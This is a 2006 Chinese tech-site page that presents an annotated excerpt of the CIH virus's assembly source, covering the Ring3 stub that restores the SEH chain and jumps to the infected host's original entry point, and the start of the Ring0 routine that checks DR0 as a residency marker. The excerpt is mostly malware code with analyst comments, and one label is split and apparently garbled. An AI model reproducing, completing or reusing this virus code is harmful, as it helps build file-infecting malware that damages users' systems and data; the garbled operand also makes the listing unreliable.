CIH源代码

http://tech.ddvip.com   2006年04月03日

本文详细介绍CIH源代码。以下列出的只是其中一个片段:Ring3 部分恢复 SEH 链并返回宿主程序原入口点的代码,以及 Ring0 初始化例程的开头。

  ; Normal (no-exception) path of the Ring3 stub. The code that leads here
  ; is not part of this excerpt.
  ; ebx = 0, so the fs:[ebx] operand used at RestoreSE addresses fs:[0].
  xor ebx, ebx

  ; Skip the exception-path stack fix-up at StopToRunVirusCode.
  jmp RestoreSE

  ; *************************************
; * When an exception occurs, the OS    *
; * should be NT (author's note), so    *
; * the virus code does not continue    *
; * to run; it jumps to the original    *
; * application instead.                *
; *************************************
; Analyst note: this is the bail-out path. It rebuilds the stack pointer
; from the SEH chain and then falls through into RestoreSE.
; NOTE(review): the instruction that registers this label as a handler is
; not in this excerpt -- confirm against the full listing.

  StopToRunVirusCode:
; Assemble-time alias for the label above; its uses are outside this excerpt.
@1 = StopToRunVirusCode

; ebx = 0 so that fs:[ebx] is fs:[0], the head of the Win32 SEH chain.
  xor ebx, ebx
; eax = address of the current exception registration record.
mov eax, fs:[ebx]
; esp = first dword of that record (its link to the previous record), so the
; pops at RestoreSE read from that earlier record.
; presumably that earlier record is the one this stub pushed before the
; faulting instruction -- TODO confirm; the setup is not shown here.
mov esp, [eax]

; Common exit: unlink the stub's SEH record, then transfer control to the
; host program's original entry point. Reached by the jmp on the normal
; path and by fall-through from StopToRunVirusCode.
  RestoreSE:
; Write the dword on top of the stack back to fs:[0] (ebx is 0 on both
; incoming paths), i.e. restore the previous head of the SEH chain.
pop dword ptr fs:[ebx]
; Discard the next stack dword; the value loaded into eax is not used in the
; visible code. presumably this is the handler-address field of the record.
pop eax

  ; *************************************
; * Return to the original app to      *
; * execute                            *
; *************************************

; presumably restores an ebp saved by the earlier setup code -- not shown.
  pop ebp

; 00401000h is only the value assembled into the source. The symbol on the
; next line is set to $-4, the address of the 4-byte immediate of this push,
; so the pushed value can be located and rewritten in place.
; NOTE(review): the code that writes to OriginalAddressOfEntryPoint is not in
; this excerpt; if it is filled in per infected file, this immediate is where
; an analyst would read the host's original entry point for repair.
  push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack

; ret pops the value just pushed and jumps to it.
  ret ; Return to Original App Entry Point

  ; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
; Analyst note: start of the Ring0 initialisation routine; only its first
; instructions are in this excerpt. How control arrives here, and what set
; the flags tested by the first jz, is not shown.

  MyExceptionHook:
; Assemble-time alias for the label above; its uses are outside this excerpt.
@2 = MyExceptionHook

; Branch on ZF as left by code outside this excerpt.
  jz InstallMyFileSystemApiHook

  ; *************************************
; * Does the virus already exist in    *
; * the system?                        *
; *************************************

; Read debug register DR0 into ecx. Moves from debug registers are
; privileged, so this instruction faults unless it executes in ring 0.
; Per the banner above, DR0 serves as the "already resident" marker.
; NOTE(review): the code that sets DR0 is not in this excerpt; where it is
; set, a non-zero DR0 with no debugger attached would be a residency
; indicator worth checking -- confirm against the full listing.
  mov ecx, dr0
; ecx == 0: marker not set, continue to the allocation step.
jecxz AllocateSystemMemoryPage

; Marker set: add an assemble-time label difference to the dword on top of
; the stack. presumably that dword is a return address, so the later return
; resumes at ReadyRestoreSE -- TODO confirm.
; NOTE(review): the second label is split across two lines and appears to
; have lost characters in extraction; the operand is left exactly as found.
  add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf
dException

  ; *************************************
; * Return to Ring3 Initial Program *
; *************************************

责编:豆豆技术应用
